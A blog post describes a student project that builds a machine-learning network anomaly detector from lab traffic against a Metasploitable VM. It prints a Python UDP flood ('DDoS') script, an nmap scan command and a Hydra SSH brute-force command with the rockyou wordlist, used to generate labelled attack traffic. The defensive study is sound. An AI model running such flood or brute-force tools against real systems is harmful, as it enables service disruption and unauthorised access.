Cyber Security

Basic Machine Learning : Network Anomaly Detection

by Mayank Nauni · October 13, 2021

Disclaimer:- This note was written by me ( Mayank Nauni) in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.

Special Thanks to Kenny Ong, my friend & course-mate at Singapore University of Technology and Design for collaborating with me on this mini-project and Tao Liu for his excellent blog on the same subject https://www.linkedin.com/pulse/build-machine-learning-model-network-flow-tao-liu/

Introduction

The ever-increasing rise in the number of network attacks have evolved as Internet technologies advancements and enhancements continue to improve our lives and in recent years, network intrusion detection has become a significant research issue in the industry.

The term network anomaly detection refers to the identification of the rare and unexpected bursts in activity within computer networking. Network anomaly is an intrusion attempt that is deliberate for (i) accessing information, (ii) information manipulation, or (iii) render a computer system or network unreliable or unusable.

In this project, to provide a proper setup in detecting anomaly detection, the concept of normality needs to be grasped. The traffic captured concerning normality and anomaly needs to be defined. The usage of tools to help create datasets can help us provide more findings in the areas of network intrusion detection methods and systems (NIDS).

Lab Setup and Topology

The network topology is set up using GNS3 Emulator as a tool to simulate the network anomaly detection system. The following are the devices and virtual machines (VM).

Switch (Gateway) Based on Cisco IOS image (12.4) – 10.0.2.1
Kali Attacker VM – 2021.2 release – 10.0.2.15
Metasploitable-2 VM – 10.0.2.2
SIEM VM – 10.0.2.30

GitHub Repo: https://github.com/mayanknauni/ML_Cybersecurity

Topology Brief:

The topology has been created on GN3 network emulator which used real IOS image for Cisco Switch (12.4 version); the Kali VM (2021.2 Release) and Metasploitable VM are created on VirtualBox and VirtualBox is integrated with GNS3, the VMs are connected to the switch using a generic driver (UDP tunnel).

On the switch end, we have created a SPAN session to capture all traffic for the network port connected to the metasploitable VM and redirect it to the SIEM VM. We will use “tshark” on the SIEM VM to convert the “. pcap” files capture to “.csv” files.

Below is the GN3 topology that we have created and used for this project, the SIEM was an additional VM that was used to sniff the data during attacks to see how the attacks are being perceived by a SIEM software.

Diagram Description automatically generated

Strategy

We will try to build a machine learning model for Wireshark packet-flow classification, we followed the below process to do the same:

The ML model is prepared according to the strategy below:

Our strategy is to execute four attacks, elaborated in the method section, and manually capture packets for them on the metasploitable server end, each capture is labelled accordingly, and later, all four captures are aggregated (including the benign network capture) to form a dataset.

The dataset is then sanitized using the python script which essentially vets the dataset for NaN values and replaces the empty cells with 0.

We also replaced the IP address and TCP flags value with integer values for our algorithm to run properly.

Methods

The creation of the datasets includes capturing the normal and benign communication between these clients and servers through Python scripts and all traffic collected via Wireshark as the packet capture tool.

The 4 kinds of attacks implemented and run from the malicious clients are as follows:

DDoS
Brute force
Probe
SQL

From these attacks, benign and malicious traffic is merged and labeled for classification and further analysis via Weka.

Attack Details

The attack was carried out at the timestamps below:

Start Time	End Time	Exploit	Remark
8:05 pm	8:15 pm	Benign	Simulating usual Web Access by using the watch at 5-second interval to simulate normal web access watch -n 5 “curl http://10.0.2.2”
8:16 pm	8:20 pm	DDOS	ddos.py
9:00 pm	9:06 pm	Probe	nmap
9:15 pm	9:20 pm	Bruteforce	Hydra
9:30 pm	9:37 pm	SQL	Metasploitable

Benign Flow Capture

We simulated usual Web Access by using the watch at the 5-second interval and captured the packets:

Command: watch -n 5 “curl http://10.0.2.2”

DDoS Attack and packet capture

We used the below-mentioned python code to simulate DDoS attack on Metasploitable2

import sys
import os
import time
import socket
import random
#Code Time
from DateTime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system(“clear”)
os.system(“figlet DDos Attack”)
print
print
ip = raw_input(“IP Target : “)
port = input(“Port : “)

os.system(“clear”)
os.system(“figlet Attack Starting”)
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print “Sent %s packet to %s throught port:%s”%(sent,ip,port)
if port == 65534:
port = 1

Command: python2 ddos.py

Text Description automatically generated

The attack started endlessly till we break the sequence.

Nmap Probe and Packet Capture

We used the below-mentioned python code to initiate a probe on Metasploitable2

Command: nmap -sC -sV -oA project 10.0.2.2

The packets were captured during the time when the scan started and completed successfully.

Graphical user interface, application Description automatically generated

Bruteforce and Packet Capture

We used Hydra to launch a brute-force attack on port 22 by SSH login attempts

Command: sudo hydra -V -f -t 4 -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.2

Graphical user interface Description automatically generated

Feature Extraction (using T-Shark)

Command:

tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf \-e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer \-e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta > benign.csv

We are selecting below 26 features from the Wireshark capture: –

Features	Description	Type
ip.src	Source Address	IPv4 address
ip.dst	Destination Address	IPv4 address
ip.len	Total Length	Unsigned integer, 2 bytes
ip.flags.df	Don’t fragment	Boolean
ip.flags.mf	More fragments	Boolean
ip.fragment	IPv4 Fragment	Frame number
ip.fragment.count	Fragment count	Unsigned integer, 4 bytes
ip.fragments	IPv4 Fragments	Sequence of bytes
ip.ttl	Time to Live	Unsigned integer, 1 byte
ip.proto	Protocol	Unsigned integer, 1 byte
tcp.window_size	Calculated window size	Unsigned integer, 4 bytes
tcp.ack	Acknowledgment Number	Unsigned integer, 4 bytes
tcp.seq	Sequence Number	Unsigned integer, 4 bytes
tcp.len	TCP Segment Len	Unsigned integer, 4 bytes
tcp.stream	Stream index	Unsigned integer, 4 bytes
tcp.urgent_pointer	Urgent Pointer	Unsigned integer, 2 bytes
tcp.flags	Flags	Unsigned integer, 2 bytes
tcp.analysis.ack_rtt	The RTT to ACK the segment was	Time offset
tcp.segments	Reassembled TCP Segments	Label
tcp.reassembled.length	Reassembled TCP length	Unsigned integer, 4 bytes
http.request	Request	Boolean
udp.port	Source or Destination Port	Unsigned integer, 2 bytes
frame.time_relative	Time since reference or first frame	Time offset
frame.time_delta	Time delta from previous captured frame	Time offset
tcp.time_relative	Time since first frame in this TCP stream	Time offset
tcp.time_delta	Time since previous frame in this TCP stream	Time offset

Data Clean-up

Command: python3 step1_cleanup.py benign.csv

The script below removes the row in the supplied csv file, beingn.csv in this case with 0 value, all null values are filled in with 0 and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.

#!/usr/bin/env python

import pandas as pd
import sys
from functools import reduce
import socket
import struct
import ipaddress

filename = sys.argv[1]
file1 = pd.read_csv(filename)
file1.head(10)
file1.isnull().sum
#print(file1.isnull().sum)
# step-1 to replace all null
update_file = file1.fillna(” “)
update_file.isnull().sum()
#print (update_file.isnull().sum())
update_file.to_csv(‘updated_’+filename, index = False)
# step-2 to remove all rows with null value
update_file = file1.fillna(0)
#print (update_file.isnull().sum())
# step-3 to convert tcp.flag, ip.dst, ip.src to integer
update_file[‘tcp.flags’] = update_file[‘tcp.flags’].apply(lambda x: int(str(x), 16))
update_file[‘ip.dst’] = update_file[‘ip.dst’].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file[‘ip.src’] = update_file[‘ip.src’].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file.to_csv(‘updated_’+filename, index = False)

The command above generated a new file with cleaned up data as “updated_beingn.csv”.

Data Labelling

We use another python script to add another column in the file “updated_benign.csv” with the name “label” and specify the label with the command below: –

Command: python2 step2_labelling.py benign updated_benign.csv

import sys
import csv

label = sys.argv[1]
file_name = sys.argv[2]

file = open(file_name)
content = csv.reader(file)
row0 = content.next()
row0.append(‘label’)
all = []
all.append(row0)
for item in content:
item.append(label)
all.append(item)

new_file = open(label+’_’+ file_name, ‘w’)
writer = csv.writer(new_file, lineterminator=’\n’)
writer.writerows(all)

It creates a new file with name benign_updated_benign.csv, where the benign highlighted in yellow is the label, we have passed with the python script.

This step is repeated for all four attacks and four additional csv files are obtained: –

benign_update_benign.csv
bruteforce_update_bruteforce.csv
ddos_update_ddos.csv
probe_update_nmap.csv
sqlattack_update_sqlattack.csv

We will aggregate the above five files into our common dataset called “master_dataset.csv”. We will use this dataset further to analyze Weka.

Analysis on Weka

We analyzed the “master_dataset.csv” in Weka software, we opened this csv in Weka, a glimpse of label attribute is below: –

Graphical user interface, application Description automatically generated

Feature Evaluation

We ran RelieFAttributeEval which yielded the below results:

A picture containing text, screenshot, window Description automatically generated

The top 15 attributes out of 26 are ranked below:

Rank	Attributes
1	tcp.stream
2	ip.flags.df
3	tcp.flags
4	ip.proto
5	tcp.window_size
6	frame.time_relative
7	ip.len
8	ip.flags.mf
9	udp.port
10	ip.fragment.count
11	tcp.len
12	tcp.analysis.ack_rtt
13	ip.dst
14	ip.fragment
15	tcp.ack

Running Different ML Models

J48

A picture containing text, screenshot, indoor Description automatically generated

Correctly Classified Instances 16204 98.4088 %

Incorrectly Classified Instances 262 1.5912 %

J48 Decision Tree View

MLP

Correctly Classified Instances 16148 98.0687 %

Incorrectly Classified Instances 318 1.9313 %

SMO

Correctly Classified Instances 15815 96.0464 %

Incorrectly Classified Instances 651 3.9536 %

Naïve Bayes

Correctly Classified Instances 15216 92.4086 %

Incorrectly Classified Instances 1250 7.5914 %

Summary of Weka Models

Based on the outputs above, J48 decision tree model gave us best accuracy so we will proceed to build a detection tool around the same.

Model	Accuracy
J48	98.41%
MLP	98.07%
SMO	96.05%
Naïve Bayes	92.41%

Building Offline Detection Tool

We used the below for building our offline detection tool: –

Python: 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0]
scipy: 1.6.0
numpy: 1.19.5
matplotlib: 3.4.3
pandas: 1.3.1
sklearn: 0.24.2

We’ve split our data into 3 datasets, one for training, another for validation, and the last one for testing. After running this program for the default dataset “master_dataset.csv”, we get the output below: –

We used the models below for comparison on accuracy: –

‘LR’ : Logistic Regression
‘LDA’: Linear Discriminant Analysis
‘KNN’: KNeighbors Classifier
‘CART’: Decision Tree Classifier

Command: python3 step3_train.py

Diagram Description automatically generated

We are using CART or Decision Tree, which is a white box type of ML algorithm. The time complexity of decision trees is a function of the number of records and number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.

As seen from the output below CART was reported to have maximum accuracy for the first comparison i.e. 98.21% which is very close to what we observed in Weka i.e. 98.40% accuracy.

The accuracy of the final testing dataset was 98.31%.

We have saved our model using the library joblib as “finalized_DT_model.sav”

Executing this model of new dataset

We initiated a fresh probe, and captured the data, converted to csv, labelled as “unknown” and appended it to master-dataset.csv, we ran the same model again and checked the confusion matrix, as seen below, the confusion matrix shows all counts of the probe into the fourth column which is probe itself.

A picture containing table Description automatically generated

We ran the amended master-dataset.csv on Weka J48 model as well to confirm our results and as expected, it gave us similar results in the confusion matrix, it confirms that the prediction works as expected:

Results

We were able to successfully produce a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with the results produced by Weka proving that the tool we’ve created and the model we’ve deployed produces legitimate results.

Discussion

We had tried “CICFlowmeter” to perform feature extraction, while it took us days to just get it running as the majority of dependencies required by it are very old, even after getting it up and running gave erroneous outputs for the same data when subjected to multiple iterations, for example for a flow length of 2200 packets it could only generate 101 packets with output, which made us switch to t-shark instead.

We tried different ways for attacking the metasploitable VM but given the limited resources of our laptop, the VMs would crash frequently hence we had to select the not-so-resource-intensive attack methodologies.

We have concluded that while our model’s accuracy rate is very high i.e. 98.4% accuracy, it is because the dataset we have used is small and hence resulted in some biasness, if we had to do it for a production environment with more infra resources available, we would have run the captures for days.

We have provided below files as part of the submission.

Serial	File	Remark
1	step1_cleanup.py	For csv cleanup python3 step1_cleanup.py filename.csv
2	step2_labelling.py	For labelling the csv python2 step2_labelling.py benign updated_benign.csv
3	step3_train.py	For training and prediction (refers to static file master_dataset.csv) python3 step3_train.py
4	master_dataset.csv	Consolidated DataSet
5	Folder Wireshark Captures	Raw Attack Wireshark Captures
6	Folder Labelled Data	Individual attack CSV files
7	finalized_DT_model.sav	Saved ML Model
8	ddos.py	For DDoS simulation python2 ddos.py